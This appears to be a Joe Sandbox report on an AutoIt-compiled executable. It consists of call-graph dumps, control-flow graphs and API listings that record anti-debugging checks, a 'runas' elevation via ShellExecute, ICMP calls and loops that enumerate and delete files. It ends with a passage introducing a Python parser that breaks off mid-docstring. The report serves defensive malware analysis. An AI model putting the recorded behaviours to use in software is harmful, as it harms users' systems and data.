98584->98582 98584->98583 98586 b53b0 299 API calls 98585->98586 98587 b951f 98586->98587 98588 f2001 98587->98588 98602 b9527 _memmove 98587->98602 98621 b5190 59 API calls Mailbox 98588->98621 98590 f22c0 98627 11a48d 89 API calls 4 library calls 98590->98627 98592 f22de 98592->98592 98593 b9583 98593->98388 98594 b9944 98596 d0fe6 Mailbox 59 API calls 98594->98596 98595 b986a 98598 b987f 98595->98598 98599 f22b1 98595->98599 98610 b96e3 _memmove 98596->98610 98597 d0fe6 59 API calls Mailbox 98597->98602 98601 d0fe6 Mailbox 59 API calls 98598->98601 98626 12a983 59 API calls 98599->98626 98608 b977d 98601->98608 98602->98590 98602->98593 98602->98594 98602->98597 98603 b96cf 98602->98603 98618 b9741 98602->98618 98603->98594 98605 b96dc 
98603->98605 98604 d0fe6 Mailbox 59 API calls 98607 b970e 98604->98607 98606 d0fe6 Mailbox 59 API calls 98605->98606 98606->98610 98607->98618 98620 bcca0 299 API calls 98607->98620 98608->98388 98609 f22a0 98625 11a48d 89 API calls 4 library calls 98609->98625 98610->98604 98610->98607 98610->98618 98614 f2278 98624 11a48d 89 API calls 4 library calls 98614->98624 98616 f2253 98623 11a48d 89 API calls 4 library calls 98616->98623 98618->98595 98618->98608 98618->98609 98618->98614 98618->98616 98622 b8180 299 API calls 98618->98622 98619->98390 98620->98618 98621->98594 98622->98618 98623->98608 98624->98608 98625->98608 98626->98590 98627->98592 98628->98419 98629->98419 98630->98419 98631->98419 98632->98419 98633->98419 98634->98415 98635->98419 98636->98419 98637->98436 98638->98426 98639->98436 98640->98434 98641->98436 98643 c1207 59 API calls 98642->98643 98644 114024 98643->98644 98645 c1207 59 API calls 98644->98645 98646 11402d 98645->98646 98647 c1207 59 API calls 98646->98647 98648 114036 98647->98648 98666 d0284 98648->98666 98653 11405c 98678 d0119 98653->98678 98654 c1900 59 API calls 98654->98653 98656 114070 FindFirstFileW 98657 1140fc FindClose 98656->98657 98660 11408f 98656->98660 98662 114107 Mailbox 98657->98662 98658 1140d7 FindNextFileW 98658->98660 98659 c1c9c 59 API calls 98659->98660 98660->98657 98660->98658 98660->98659 98661 c17e0 59 API calls 98660->98661 98729 c1900 98660->98729 98661->98660 98662->98443 98665 1140f3 FindClose 98665->98662 98736 e1b70 98666->98736 98669 d02cd 98751 c19e1 98669->98751 98670 d02b0 98742 c1821 98670->98742 98673 d02bc 98738 c133d 98673->98738 98676 114fec GetFileAttributesW 98677 11404a 98676->98677 98677->98653 98677->98654 98679 c1207 59 API calls 98678->98679 98680 d012f 98679->98680 98681 c1207 59 API calls 98680->98681 98682 d0137 98681->98682 98683 c1207 59 API calls 98682->98683 98684 d013f 98683->98684 98685 c1207 59 API calls 98684->98685 98686 d0147 98685->98686 98687 d017b 98686->98687 98688 
10627d 98686->98688 98689 c1462 59 API calls 98687->98689 98690 c1c9c 59 API calls 98688->98690 98691 d0189 98689->98691 98692 106286 98690->98692 98693 c1981 59 API calls 98691->98693 98694 c19e1 59 API calls 98692->98694 98695 d0193 98693->98695 98697 d01be 98694->98697 98696 c1462 59 API calls 98695->98696 98695->98697 98699 d01b4 98696->98699 98698 d01fe 98697->98698 98700 d01dd 98697->98700 98711 1062a6 98697->98711 98763 c1462 98698->98763 98702 c1981 59 API calls 98699->98702 98776 c1609 98700->98776 98702->98697 98703 106376 98707 c1821 59 API calls 98703->98707 98705 d020f 98706 d0221 98705->98706 98709 c1c9c 59 API calls 98705->98709 98710 d0231 98706->98710 98712 c1c9c 59 API calls 98706->98712 98718 106333 98707->98718 98709->98706 98714 d0238 98710->98714 98716 c1c9c 59 API calls 98710->98716 98711->98703 98713 10635f 98711->98713 98726 1062dd 98711->98726 98712->98710 98713->98703 98720 10634a 98713->98720 98717 c1c9c 59 API calls 98714->98717 98725 d023f Mailbox 98714->98725 98715 c1462 59 API calls 98715->98698 98716->98714 98717->98725 98718->98698 98719 c1609 59 API calls 98718->98719 98779 c153b 59 API calls 2 library calls 98718->98779 98719->98718 98723 c1821 59 API calls 98720->98723 98721 10633b 98722 c1821 59 API calls 98721->98722 98722->98718 98723->98718 98725->98656 98726->98721 98727 106326 98726->98727 98728 c1821 59 API calls 98727->98728 98728->98718 98730 c1914 98729->98730 98731 ff534 98729->98731 98781 c18a5 98730->98781 98732 c1c7e 59 API calls 98731->98732 98735 ff53f __wsetenvp _memmove 98732->98735 98734 c191f DeleteFileW 98734->98658 98734->98665 98737 d0291 GetFullPathNameW 98736->98737 98737->98669 98737->98670 98739 c134b 98738->98739 98755 c1981 98739->98755 98741 c135b 98741->98676 98743 c182d __wsetenvp 98742->98743 98744 c189a 98742->98744 98746 c1868 98743->98746 98747 c1843 98743->98747 98745 c1981 59 API calls 98744->98745 98750 c184b _memmove 98745->98750 98760 c1c7e 98746->98760 98759 c1b7c 59 API calls Mailbox 
98747->98759 98750->98673 98752 c19fb 98751->98752 98754 c19ee 98751->98754 98753 d0fe6 Mailbox 59 API calls 98752->98753 98753->98754 98754->98673 98756 c198f 98755->98756 98757 c1998 _memmove 98755->98757 98756->98757 98758 c1aa4 59 API calls 98756->98758 98757->98741 98758->98757 98759->98750 98761 d0fe6 Mailbox 59 API calls 98760->98761 98762 c1c88 98761->98762 98762->98750 98764 c14ce 98763->98764 98765 c1471 98763->98765 98766 c1981 59 API calls 98764->98766 98765->98764 98767 c147c 98765->98767 98773 c149f _memmove 98766->98773 98768 ff1de 98767->98768 98769 c1497 98767->98769 98770 c1c7e 59 API calls 98768->98770 98780 c1b7c 59 API calls Mailbox 98769->98780 98772 ff1e8 98770->98772 98774 d0fe6 Mailbox 59 API calls 98772->98774 98773->98705 98775 ff208 98774->98775 98777 c1aa4 59 API calls 98776->98777 98778 c1614 98777->98778 98778->98698 98778->98715 98779->98718 98780->98773 98782 c18b4 __wsetenvp 98781->98782 98783 c1c7e 59 API calls 98782->98783 98784 c18c5 _memmove 98782->98784 98785 ff4f1 _memmove 98783->98785 98784->98734 98787 11f8f2 98786->98787 98788 11f898 98786->98788 98862 11fbb7 59 API calls 98787->98862 98789 d0fe6 Mailbox 59 API calls 98788->98789 98791 11f89f 98789->98791 98792 11f8ab 98791->98792 98849 c3df7 60 API calls Mailbox 98791->98849 98794 b4d37 84 API calls 98792->98794 98799 11f8bd 98794->98799 98795 11f8ff 98796 11f9cb 98795->98796 98797 11f8d9 98795->98797 98803 11f93f 98795->98803 98842 118cd0 98796->98842 98797->98448 98850 c3e47 98799->98850 98800 11f9d2 98846 11394d 98800->98846 98805 b4d37 84 API calls 98803->98805 98804 11f8cd 98804->98797 98861 c3f0b CloseHandle 98804->98861 98815 11f946 98805->98815 98807 11f9c1 98823 11399c 98807->98823 98810 c162d 59 API calls 98812 11f98a 98810->98812 98811 c42cf CloseHandle 98813 11fa20 98811->98813 98814 c1c9c 59 API calls 98812->98814 98813->98797 98863 c3f0b CloseHandle 98813->98863 98816 11f994 98814->98816 98815->98807 98819 11f97a 98815->98819 98818 c1900 59 API calls 
100798->100805 100801 b6413 100799->100801 100802 ee172 100799->100802 100801->100805 100831 b5447 Mailbox 100801->100831 100982 12c87c 85 API calls 2 library calls 100802->100982 100983 12c9c9 95 API calls Mailbox 100805->100983 100807 ee19d 100807->100807 100808 d0fe6 59 API calls Mailbox 100808->100831 100809 ef165 100995 11a48d 89 API calls 4 library calls 100809->100995 100810 ee691 100987 11a48d 89 API calls 4 library calls 100810->100987 100813 b69fa 100821 c1c9c 59 API calls 100813->100821 100815->100777 100815->100785 100819 ee2e9 VariantClear 100815->100819 100815->100830 100836 12f1b2 91 API calls 100815->100836 100838 11412a 3 API calls 100815->100838 100841 12e60c 130 API calls 100815->100841 100844 bd679 100815->100844 100884 11413a 100815->100884 100887 bcfd7 100815->100887 100906 11d6be 100815->100906 100951 125e1d 100815->100951 100978 b5190 59 API calls Mailbox 100815->100978 100986 107aad 59 API calls 100815->100986 100817 ee6a0 100818 c1c9c 59 API calls 100818->100831 100819->100815 100820 b69ff 100820->100809 100820->100810 100821->100830 100823 eea9a 100825 c1c9c 59 API calls 100823->100825 100825->100830 100826 c1207 59 API calls 100826->100831 100827 eeb67 100827->100830 100988 107aad 59 API calls 100827->100988 100828 107aad 59 API calls 100828->100831 100831->100808 100831->100810 100831->100813 100831->100818 100831->100820 100831->100823 100831->100826 100831->100827 100831->100828 100831->100830 100832 d2f70 67 API calls __cinit 100831->100832 100833 eef28 100831->100833 100835 b5a1a 100831->100835 100976 b7e50 299 API calls 2 library calls 100831->100976 100977 b6e30 60 API calls Mailbox 100831->100977 100832->100831 100989 11a48d 89 API calls 4 library calls 100833->100989 100994 11a48d 89 API calls 4 library calls 100835->100994 100836->100815 100838->100815 100841->100815 100996 b4f98 100844->100996 100848 d0fe6 Mailbox 59 API calls 100849 bd6aa 100848->100849 100852 bd6ba 100849->100852 101023 c3df7 60 API calls Mailbox 
100849->101023 100850 bd6df 100855 b502b 59 API calls 100850->100855 100860 bd6ec 100850->100860 100851 f5068 100851->100850 101028 11fbb7 59 API calls 100851->101028 100854 b4d37 84 API calls 100852->100854 100856 bd6c8 100854->100856 100858 f50b0 100855->100858 100857 c3e47 67 API calls 100856->100857 100859 bd6d7 100857->100859 100858->100860 100861 f50b8 100858->100861 100859->100850 100859->100851 101027 c3f0b CloseHandle 100859->101027 101009 c41d6 100860->101009 100863 b502b 59 API calls 100861->100863 100865 bd6f3 100863->100865 100866 f50ca 100865->100866 100867 bd70d 100865->100867 100869 d0fe6 Mailbox 59 API calls 100866->100869 100868 c1207 59 API calls 100867->100868 100871 bd715 100868->100871 100870 f50d0 100869->100870 100872 f50e4 100870->100872 100874 c3ea1 2 API calls 100870->100874 101024 c3b7b 65 API calls Mailbox 100871->101024 100877 f50e8 _memmove 100872->100877 101014 117c7f 100872->101014 100874->100872 100876 bd724 100876->100877 101025 b4f3c 59 API calls Mailbox 100876->101025 100879 bd738 Mailbox 100880 bd772 100879->100880 100881 c42cf CloseHandle 100879->100881 100880->100815 100882 bd766 100881->100882 100882->100880 101026 c3f0b CloseHandle 100882->101026 100885 11494a 3 API calls 100884->100885 100886 11413f 100885->100886 100886->100815 100888 b4d37 84 API calls 100887->100888 100889 bd001 100888->100889 100890 b5278 59 API calls 100889->100890 100891 bd018 100890->100891 100892 bd57b 100891->100892 100893 b502b 59 API calls 100891->100893 100902 bd439 Mailbox __wsetenvp 100891->100902 100892->100815 100893->100902 100894 d312d _W_store_winword 60 API calls 100894->100902 100895 d0c65 62 API calls 100895->100902 100896 c162d 59 API calls 100896->100902 100897 b4f98 59 API calls 100897->100902 100900 b4d37 84 API calls 100900->100902 100901 b502b 59 API calls 100901->100902 100902->100892 100902->100894 100902->100895 100902->100896 100902->100897 100902->100900 100902->100901 100903 c1821 59 API calls 100902->100903 100904 c59d3 
94 API calls 100902->100904 100905 c5ac3 Shell_NotifyIconW 100902->100905 101029 c153b 59 API calls 2 library calls 100902->101029 101030 b4f3c 59 API calls Mailbox 100902->101030 100903->100902 100904->100902 100905->100902 100907 11d6dd 100906->100907 100908 11d6e8 100906->100908 100909 b502b 59 API calls 100907->100909 100910 11d7c2 Mailbox 100908->100910 100912 c1207 59 API calls 100908->100912 100909->100908 100911 d0fe6 Mailbox 59 API calls 100910->100911 100948 11d7cb Mailbox 100910->100948 100913 11d80b 100911->100913 100914 11d70c 100912->100914 100915 11d817 100913->100915 101031 c3df7 60 API calls Mailbox 100913->101031 100916 c1207 59 API calls 100914->100916 100918 b4d37 84 API calls 100915->100918 100919 11d715 100916->100919 100920 11d82f 100918->100920 100921 b4d37 84 API calls 100919->100921 100922 c3e47 67 API calls 100920->100922 100923 11d721 100921->100923 100924 11d83e 100922->100924 100925 d0119 59 API calls 100923->100925 100926 11d842 GetLastError 100924->100926 100927 11d876 100924->100927 100928 11d736 100925->100928 100929 11d85b 100926->100929 100931 11d8a1 100927->100931 100932 11d8d8 100927->100932 100930 c17e0 59 API calls 100928->100930 100929->100948 101032 c3f0b CloseHandle 100929->101032 100933 11d769 100930->100933 100934 d0fe6 Mailbox 59 API calls 100931->100934 100935 d0fe6 Mailbox 59 API calls 100932->100935 100939 11412a 3 API calls 100933->100939 100950 11d793 Mailbox 100933->100950 100936 11d8a6 100934->100936 100940 11d8dd 100935->100940 100941 11d8b7 100936->100941 100944 c1207 59 API calls 100936->100944 100938 b502b 59 API calls 100938->100910 100942 11d779 100939->100942 100943 c1207 59 API calls 100940->100943 100940->100948 101033 11fc0d 59 API calls 2 library calls 100941->101033 100946 c1a36 59 API calls 100942->100946 100942->100950 100943->100948 100944->100941 100947 11d78a 100946->100947 100949 113f1d 63 API calls 100947->100949 100948->100815 100949->100950 100950->100938 100952 125e46 100951->100952 100953 
125e74 WSAStartup 100952->100953 100954 b502b 59 API calls 100952->100954 100955 125e9d 100953->100955 100975 125e88 Mailbox 100953->100975 100957 125e61 100954->100957 100956 c40cd 59 API calls 100955->100956 100958 125ea6 100956->100958 100957->100953 100960 b502b 59 API calls 100957->100960 100959 b4d37 84 API calls 100958->100959 100961 125eb2 100959->100961 100962 125e70 100960->100962 100963 c402a 61 API calls 100961->100963 100962->100953 100964 125ebf inet_addr gethostbyname 100963->100964 100965 125edd IcmpCreateFile 100964->100965 100964->100975 100966 125f01 100965->100966 100965->100975 100967 d0fe6 Mailbox 59 API calls 100966->100967 100968 125f1a 100967->100968 100969 c433f 59 API calls 100968->100969 100970 125f25 100969->100970 100971 125f34 IcmpSendEcho 100970->100971 100972 125f55 IcmpSendEcho 100970->100972 100973 125f6d 100971->100973 100972->100973 100974 125fd4 IcmpCloseHandle WSACleanup 100973->100974 100974->100975 100975->100815 100976->100831 100977->100831 100978->100815 100979->100776 100980->100777 100981->100798 100982->100805 100983->100807 100984->100776 100985->100776 100986->100815 100987->100817 100988->100830 100989->100835 100990->100785 100991->100830 100992->100785 100993->100785 100994->100830 100995->100830 100997 b4fa8 100996->100997 100998 edd2b 100996->100998 101003 d0fe6 Mailbox 59 API calls 100997->101003 100999 edd3c 100998->100999 101000 c1821 59 API calls 100998->101000 101001 c19e1 59 API calls 100999->101001 101000->100999 101002 edd46 101001->101002 101006 b4fd4 101002->101006 101008 c1207 59 API calls 101002->101008 101004 b4fbb 101003->101004 101004->101002 101005 b4fc6 101004->101005 101005->101006 101007 c1a36 59 API calls 101005->101007 101006->100848 101006->100851 101007->101006 101008->101006 101010 c410a 2 API calls 101009->101010 101011 c41f7 101010->101011 101012 c410a 2 API calls 101011->101012 101013 c420b 101012->101013 101013->100865 101015 117c8a 101014->101015 101016 d0fe6 Mailbox 59 API calls 
101015->101016 101017 117c91 101016->101017 101018 117c9d 101017->101018 101019 117cbe 101017->101019 101020 d0fe6 Mailbox 59 API calls 101018->101020 101021 d0fe6 Mailbox 59 API calls 101019->101021 101022 117ca6 _memset 101020->101022 101021->101022 101022->100877 101023->100852 101024->100876 101025->100879 101026->100880 101027->100851 101028->100851 101029->100902 101030->100902 101031->100915 101032->100948 101033->100948

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000C526C
                                          • IsDebuggerPresent.KERNEL32 ref: 000C527E
                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 000C52E6
                                            • Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B
                                            • Part of subcall function 000BBBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 000BBC07
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 000C5366
                                          • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00100B2E
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00100B66
                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00166D10), ref: 00100BE9
                                          • ShellExecuteW.SHELL32(00000000), ref: 00100BF0
                                            • Part of subcall function 000C514C: GetSysColorBrush.USER32(0000000F), ref: 000C5156
                                            • Part of subcall function 000C514C: LoadCursorW.USER32(00000000,00007F00), ref: 000C5165
                                            • Part of subcall function 000C514C: LoadIconW.USER32(00000063), ref: 000C517C
                                            • Part of subcall function 000C514C: LoadIconW.USER32(000000A4), ref: 000C518E
                                            • Part of subcall function 000C514C: LoadIconW.USER32(000000A2), ref: 000C51A0
                                            • Part of subcall function 000C514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000C51C6
                                            • Part of subcall function 000C514C: RegisterClassExW.USER32(?), ref: 000C521C
                                            • Part of subcall function 000C50DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000C5109
                                            • Part of subcall function 000C50DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000C512A
                                            • Part of subcall function 000C50DB: ShowWindow.USER32(00000000), ref: 000C513E
                                            • Part of subcall function 000C50DB: ShowWindow.USER32(00000000), ref: 000C5147
                                            • Part of subcall function 000C59D3: _memset.LIBCMT ref: 000C59F9
                                            • Part of subcall function 000C59D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 000C5A9E
                                          Strings
                                          • AutoIt, xrefs: 00100B23
                                          • runas, xrefs: 00100BE4
                                          • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00100B28
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                          • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                          • API String ID: 529118366-2030392706
                                          • Opcode ID: ad4623ffb41c9557d635101dd40b4832555e1b7a34bc0d4b132cdce1deb5c90e
                                          • Instruction ID: 4dca7a9009b973230876e426ee1736dc2d3be425ecc69871cc06c05457b3f6bd
                                          • Opcode Fuzzy Hash: ad4623ffb41c9557d635101dd40b4832555e1b7a34bc0d4b132cdce1deb5c90e
                                          • Instruction Fuzzy Hash: DB51F434948248AECB12ABB0DC46FED7B74AF1A381F14416DF565621E3DFB05AC5CB21

                                          Control-flow Graph

                                          control_flow_graph 823 113ce2-113d48 call c1207 * 4 call d0284 * 2 call 114f82 call 114fec 840 113d53-113d5d call 114fec 823->840 841 113d4a-113d4e call c1900 823->841 845 113d68-113da6 call c1207 * 2 call d0119 FindFirstFileW 840->845 846 113d5f-113d63 call c1900 840->846 841->840 854 113eb4-113ebb FindClose 845->854 855 113dac 845->855 846->845 857 113ebe-113ef6 call c1cb6 * 6 854->857 856 113db2-113db4 855->856 856->854 858 113dba-113dc1 856->858 860 113dc7-113e1f call c1a36 call 114561 call c1cb6 call c1c9c call c17e0 call c1900 call 11412a 858->860 861 113e88-113e9b FindNextFileW 858->861 888 113e21-113e24 860->888 889 113e40-113e44 860->889 861->856 864 113ea1-113ea6 861->864 864->856 890 113eab-113eb2 FindClose 888->890 891 113e2a-113e3c call c151f 888->891 892 113e72-113e78 call 113ef7 889->892 893 113e46-113e49 889->893 890->857 900 113e4e-113e57 MoveFileW 891->900 904 113e3e DeleteFileW 891->904 898 113e7d 892->898 896 113e59-113e69 call 113ef7 893->896 897 113e4b 893->897 896->890 905 113e6b-113e70 DeleteFileW 896->905 897->900 903 113e80-113e82 898->903 900->903 903->890 906 113e84 903->906 904->889 905->903 906->861
                                          APIs
                                            • Part of subcall function 000D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C2A58,?,00008000), ref: 000D02A4
                                            • Part of subcall function 00114FEC: GetFileAttributesW.KERNEL32(?,00113BFE), ref: 00114FED
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00113D96
                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00113E3E
                                          • MoveFileW.KERNEL32(?,?), ref: 00113E51
                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00113E6E
                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00113E90
                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00113EAC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                          • String ID: \*.*
                                          • API String ID: 4002782344-1173974218
                                          • Opcode ID: f2f2d444400fdbaee13d7b2b171f234bfc17674f2850f024c559256c13f09948
                                          • Instruction ID: 64c32b0b35f1365618dd413834627f7a33bb3160d3e5c1ef1b28581780689cfc
                                          • Opcode Fuzzy Hash: f2f2d444400fdbaee13d7b2b171f234bfc17674f2850f024c559256c13f09948
                                          • Instruction Fuzzy Hash: DB51903580120DABCF19EBA0C992EEDB779AF16300F200169E452B7197EF316F49CB60

                                          Control-flow Graph

                                          control_flow_graph 957 c5d13-c5d73 call c1207 GetVersionExW call c1821 962 c5e78-c5e7a 957->962 963 c5d79 957->963 964 100fa9-100fb5 962->964 965 c5d7c-c5d81 963->965 966 100fb6-100fba 964->966 967 c5e7f-c5e80 965->967 968 c5d87 965->968 970 100fbc 966->970 971 100fbd-100fc9 966->971 969 c5d88-c5dbf call c1981 call c133d 967->969 968->969 980 101098-10109b 969->980 981 c5dc5-c5dc6 969->981 970->971 971->966 972 100fcb-100fd0 971->972 972->965 974 100fd6-100fdd 972->974 974->964 976 100fdf 974->976 979 100fe4-100fea 976->979 986 c5e00-c5e17 GetCurrentProcess IsWow64Process 979->986 982 1010b4-1010b8 980->982 983 10109d 980->983 984 c5dcc-c5dcf 981->984 985 100fef-100ffa 981->985 991 1010a3-1010ac 982->991 992 1010ba-1010c3 982->992 989 1010a0 983->989 984->986 990 c5dd1-c5def 984->990 987 101017-101019 985->987 988 100ffc-101002 985->988 993 c5e1c-c5e2d 986->993 994 c5e19 986->994 998 10101b-101027 987->998 999 10103c-10103f 987->999 995 101004-101007 988->995 996 10100c-101012 988->996 989->991 990->986 997 c5df1-c5df7 990->997 991->982 992->989 1000 1010c5-1010c8 992->1000 1001 c5e2f-c5e3f call c55f0 993->1001 1002 c5e98-c5ea2 GetSystemInfo 993->1002 994->993 995->986 996->986 997->979 1003 c5dfd 997->1003 1004 101031-101037 998->1004 1005 101029-10102c 998->1005 1007 101041-101050 999->1007 1008 101065-101068 999->1008 1000->991 1014 c5e8c-c5e96 GetSystemInfo 1001->1014 1015 c5e41-c5e4e call c55f0 1001->1015 1006 c5e65-c5e75 1002->1006 1003->986 1004->986 1005->986 1010 101052-101055 1007->1010 1011 10105a-101060 1007->1011 1008->986 1013 10106e-101083 1008->1013 1010->986 1011->986 1016 101085-101088 1013->1016 1017 10108d-101093 1013->1017 1018 c5e56-c5e5a 1014->1018 1022 c5e85-c5e8a 1015->1022 1023 c5e50-c5e54 GetNativeSystemInfo 1015->1023 1016->986 1017->986 1018->1006 1021 c5e5c-c5e5f FreeLibrary 1018->1021 1021->1006 1022->1023 1023->1018
                                          APIs
                                          • GetVersionExW.KERNEL32(?), ref: 000C5D40
                                            • Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B
                                          • GetCurrentProcess.KERNEL32(?,00140A18,00000000,00000000,?), ref: 000C5E07
                                          • IsWow64Process.KERNEL32(00000000), ref: 000C5E0E
                                          • GetNativeSystemInfo.KERNEL32(00000000), ref: 000C5E54
                                          • FreeLibrary.KERNEL32(00000000), ref: 000C5E5F
                                          • GetSystemInfo.KERNEL32(00000000), ref: 000C5E90
                                          • GetSystemInfo.KERNEL32(00000000), ref: 000C5E9C
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                          • String ID:
                                          • API String ID: 1986165174-0
                                          • Opcode ID: 580ec2f2fe32f30be933fdda2e3cb7e4e6e9a4e52edaa6f0ffa6fdb694b2ec86
                                          • Instruction ID: 64feae22f5b60498fbcc986de67000b9585071e510987b18fa76d2eead56d5d9
                                          • Opcode Fuzzy Hash: 580ec2f2fe32f30be933fdda2e3cb7e4e6e9a4e52edaa6f0ffa6fdb694b2ec86
                                          • Instruction Fuzzy Hash: D691F635549BC0DEC735CB788850AAFBFE56F2A301B880A5ED0C793A82D274B588D759

                                          Control-flow Graph

                                          control_flow_graph 1024 114005-11404c call c1207 * 3 call d0284 call 114fec 1035 11405c-11408d call d0119 FindFirstFileW 1024->1035 1036 11404e-114057 call c1900 1024->1036 1040 1140fc-114103 FindClose 1035->1040 1041 11408f-114091 1035->1041 1036->1035 1043 114107-114129 call c1cb6 * 3 1040->1043 1041->1040 1042 114093-114098 1041->1042 1044 1140d7-1140e9 FindNextFileW 1042->1044 1045 11409a-1140d5 call c1c9c call c17e0 call c1900 DeleteFileW 1042->1045 1044->1041 1049 1140eb-1140f1 1044->1049 1045->1044 1059 1140f3-1140fa FindClose 1045->1059 1049->1041 1059->1043
                                          APIs
                                            • Part of subcall function 000D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C2A58,?,00008000), ref: 000D02A4
                                            • Part of subcall function 00114FEC: GetFileAttributesW.KERNEL32(?,00113BFE), ref: 00114FED
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0011407C
                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 001140CC
                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 001140DD
                                          • FindClose.KERNEL32(00000000), ref: 001140F4
                                          • FindClose.KERNEL32(00000000), ref: 001140FD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                          • String ID: \*.*
                                          • API String ID: 2649000838-1173974218
                                          • Opcode ID: d52aa292c22c9d04c792a00f2863849ad2e98a5e436d96f9ea90d4548deb3667
                                          • Instruction ID: 76ccbe3ce90d48f41d43ce5197f4cb1b6f5eb1796945d0d9712e379d8eb4256c
                                          • Opcode Fuzzy Hash: d52aa292c22c9d04c792a00f2863849ad2e98a5e436d96f9ea90d4548deb3667
                                          • Instruction Fuzzy Hash: C4315E350083859BC205EF64C895EEFB7A8BF9A704F444A2DF5E582193DB30DA49C763
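The control_flow_graph listing above is the text behind the rendered graph of the function at 0x114005: node ids with their address ranges and labels, followed by src->dst edges. The parser below is an added example and is not part of the Joe Sandbox report or of the AutoIt runtime under analysis. Its grammar is inferred from the listings on this page (an assumption, not a documented format), the sample is the 0x114005 listing copied verbatim, and the function names (parse_cfg, loop_nodes, apis_in_loops) are mine. It answers the question a triager asks of this record: which API calls run inside a loop. For this listing the answer is FindNextFileW and DeleteFileW, so the routine enumerates a directory listing (the "\*.*" string of the record) and deletes every entry it finds, while both FindClose calls sit outside the loop.

```python
"""Parse a Joe Sandbox control_flow_graph listing and report which API calls
sit inside a loop.

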